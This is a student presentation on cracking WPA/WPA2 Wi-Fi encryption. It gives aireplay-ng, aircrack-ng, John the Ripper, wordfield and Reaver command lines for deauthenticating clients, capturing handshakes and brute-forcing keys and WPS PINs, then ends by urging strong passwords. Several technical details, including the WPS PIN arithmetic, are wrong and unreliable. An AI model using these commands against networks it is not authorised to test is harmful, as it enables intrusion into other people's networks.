This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.
1. WPA EXPLOITATION IN
THE WORLD OF WIRELESS
NETWORK
By Hariraj Rathod
8th sem
Department of Electronics and
Communication
2. WIFI – WIRELESS FIDELITY
Wi-Fi, is a popular technology that allows an
electronic device to exchange data or
connect to the internet wirelessly using
radio waves.
Wireless access allows users to connect to
the internet from any location within range
of a wireless access point.
3. SOME BASIC TERMS
MAC address or physical address is a unique
identifier assigned to network interfaces for
communications
Access point >> Wireless router
SSID (service set identifier) >> Network Name
BSSID (basic service set identification ) >>
MAC address of the access point
4. BASIC WORKING
When a user uses wireless internet they generate
what are called data “packets”.
Packets are transmitted between the wireless card
and the wireless access point via radio waves
whenever the computer is connected with the
access point.
5. BASIC WORKING CONTD.
Depending on how long the computer is connected,
it can generate a certain number of packets per
day.
The more users that are connected to one access
point, the more packets are generated.
7. WIRELESS ENCRYPTION
The main source of vulnerability associated
with wireless networks are the methods of
encryption. Different type of wireless
encryption are as follows:
WEP
WPA
WPA2
8. WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by the key of 10 or
26 hexadecimal digits.
WEP protocol was not developed by researchers or
experts in security and cryptography.
Initial bytes of the key stream depended on just a
few bits of the encryption key.
9. WEP CONTINUED
WEP Encryption Process
ICV:-32 bit integrity check value (ICV)
IV:- Initialization Vector
10. WEP CONTINUED
WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker
can remotely capture large amounts of WEP ciphertext and use
cryptanalysis methods to determine the WEP key.
11. WPA OR WPA2
Stands for Wi-Fi Protected Access
Created to provide stronger security
Still able to be cracked if a short password is used.
If a long passphrase or password is used, these protocol are
virtually not crackable.
WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance
Encryption Standard) use a Pre-Shared Key (PSK) that is more than 7
and less than 64 characters in length.
WPS (WiFi protected Feature) simple plug and play feature.
12. USING BACKTRACK >>
Some Basic Backtrack Terms >>
Wlan1 – wireless interface
Mon0 – monitor mode
Handshake –
refers to the negotiation process between the computer
and a WiFi server using WPA encryption.
Needed to crack WPA/WPA2.
Dictionary - consisting the list of common
passwords.
.cap file – used to store packets.
13. MONITOR MODE
Monitor mode, or RFMON (Radio Frequency
MONitor) mode, allows a computer with a wireless
network interface controller (WNIC) to monitor all
traffic received from the wireless network.
Monitor mode allows packets to be captured
without having to associate with an access point
first.
14. TOOLS USED
Airmon-ng >> Placing different cards in monitor mode
Airodump-ng (Packet sniffer ) >> Tool used to listen to
wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to
inject frames.
The primary function is to generate traffic for the later use
in aircrack-ng for cracking the WEP and WPA-PSK keys.
Aircrack-ng >> Cracks WEP and WPA (Dictionary
attack) keys.
18. AIRCRACK-NG CONTINUED
Deauthenticate the device connected to access
point and force them to re exchange WPA key.
Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 –c
90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells
aireplay to inject deauthentication packets (4 of
them), "-a" is the wireless access point MAC
address and "-c" is the client (victim) MAC address.
21. AIRCRACK-NG CONTINUED
Cracking the WPA key using aircrack-ng, dictionary
file and 4-way handshake captured file redot.cap
aircrack-ng -w
/home/pranav/download/password.lst–b
F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use.
22. JOHN THE RIPPER
Faster then the previously used tool.
/pentest/password/john-1.7.6.jumbo12/run/john -
stdout -incremantal all aircrack-ng –b
00:17:9A:82:44:1B -w -/home/pranav/test-01.cap
23. WORD FIELD
Word Field is a brute force attack.
Command line used wordfield [OPTION...]
MINLENGTH [MAXLENGTH]
Wordfield -a -n 8 8" will output all possible
alphanumeric strings which are 8 characters long.
wordfield -a -n 8 8 | aircrack-ng –b
00:17:9A:82:44:1B -w - /home/pranav/Wifire-
02.cap
This attack is really effective on weak keys.
25. DICTIONARY AND BRUTE FORCE LIMITATIONS
Passphrase cant be necessarily be found in
Dictionary list hence it has its limitations.
Brute force technics require lot of fast hardware
computational power.
Source: http://lastbit.com/pswcalc.asp
26. REAVER TOOL.
Reaver is fantastic tool to crack WPS pin written by
Craig Heffner.
This tool exploits the wps 8 digit pin.
1 bit is a checksum bit.
7 unknown numbers, meaning there are a possible
10^7 (10,000,000) combinations which will take
approximately 116 days to break at 1 attempt every
second.
29. REAVER TOOL CONTINUED
CRACKING TECHNIQUE
WPS pin 6502-0920
10^4 (10,000) combinations.
But since 1st bit is checksum bit hence the
combinations reduce to 10^3(1000)
This reduces the time required to break the PIN to
just over 3 hours - Again, assuming that 1 attempt
is made every second.